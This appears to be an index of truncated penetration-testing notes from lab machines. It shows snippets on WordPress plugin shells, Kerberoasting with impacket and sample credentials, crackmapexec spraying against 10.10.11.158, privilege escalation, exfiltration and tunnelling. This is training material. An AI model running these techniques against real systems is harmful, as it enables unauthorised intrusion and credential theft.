Obtaining a Shell To obtain a shell, we first must package the plugin in a way that WordPress knows how to handle. WordPress expects plugins to be in a zip file. When WordPress receives the zip fi...

Extracting SPNs from kali parameter (-k) is used for Kerberos Authentication (NTLM is used by default): # Example 1 (with Kerberos) impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -k -dc-ip dc1.s...

This article assumes that you have already obtained a low privilege shell on your victim’s computer. You have enumerated this machine and concluded that the operating system is Windows XP with SP0 ...

Basic Compilation gcc -o exploit exploit.c 32-Bit Compilation gcc -m32 -Wl,--hash-style=both -o exploit exploit.c

WinPeas On Windows, one automated script is WinPeas Windows-Privesc-Check Another automated script is windows-privesc-check, which can be found in the windows-privesc-check We’ll specify the self...

In certain scenarios, we may need to exfiltrate data from a target network using a Windows client. This can be complex since standard TFTP, FTP, and HTTP servers are rarely enabled on Windows by de...

SMB crackmapexec smb 10.10.11.158 -u users -p creds Example: [[StreamIO#^11d8df]] LDAP crackmapexec ldap 10.10.11.158 -u users -p creds --continue-on-success [[StreamIO#^676765]] WINRM crackmap...

During the enumeration and information gathering process, we discover a MySQL service running on TCP port 3306. C:\Windows\system32>netstat -anpb TCP netstat -anpb TCP Active Connections P...

For this to work, the Windows system must have the IP Helper service running and IPv6 support must be enabled for the interface we want to use. Fortunately, both are on and enabled by default on Wi...

Our goal is to initiate a remote desktop connection from our Kali Linux machine to the Windows Server 2016 through the compromised Linux server using only the HTTP protocol. We will rely on HTTPTu...